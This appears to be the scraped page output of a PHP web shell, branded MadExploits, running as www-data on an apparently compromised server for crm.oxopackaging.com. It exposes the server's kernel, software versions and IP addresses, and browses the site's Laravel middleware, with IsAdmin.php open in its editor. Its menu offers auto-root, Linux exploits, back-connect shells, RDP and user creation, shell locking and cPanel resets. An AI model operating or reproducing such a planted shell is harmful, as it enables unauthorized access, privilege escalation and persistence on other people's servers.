Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.114.232
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
crm.oxopackaging.com /
app /
Http /
Middleware /
[ HOME SHELL ]
Name
Size
Permission
Action
Authenticate.php
475
B
-rw-r--r--
EncryptCookies.php
294
B
-rw-r--r--
IsAdmin.php
572
B
-rw-r--r--
PreventRequestsDuringMaintenan...
353
B
-rw-r--r--
RedirectIfAuthenticated.php
734
B
-rw-r--r--
TrimStrings.php
368
B
-rw-r--r--
TrustHosts.php
354
B
-rw-r--r--
TrustProxies.php
596
B
-rw-r--r--
TwoFactorMiddleware.php
341
B
-rw-r--r--
VerifyCsrfToken.php
307
B
-rw-r--r--
clientAPI.php
1014
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : IsAdmin.php
<?php namespace App\Http\Middleware; use Closure; use Illuminate\Http\Request; use Illuminate\Support\Facades\Auth; class IsAdmin { /** * Handle an incoming request. * * @param \Illuminate\Http\Request $request * @param \Closure $next * @return mixed */ public function handle(Request $request, Closure $next) { if (Auth::check() && (Auth::user()->hasRole('super-admin') || Auth::user()->can('admin_access'))) { return $next($request); } return redirect(route('admin.login')); } }
Close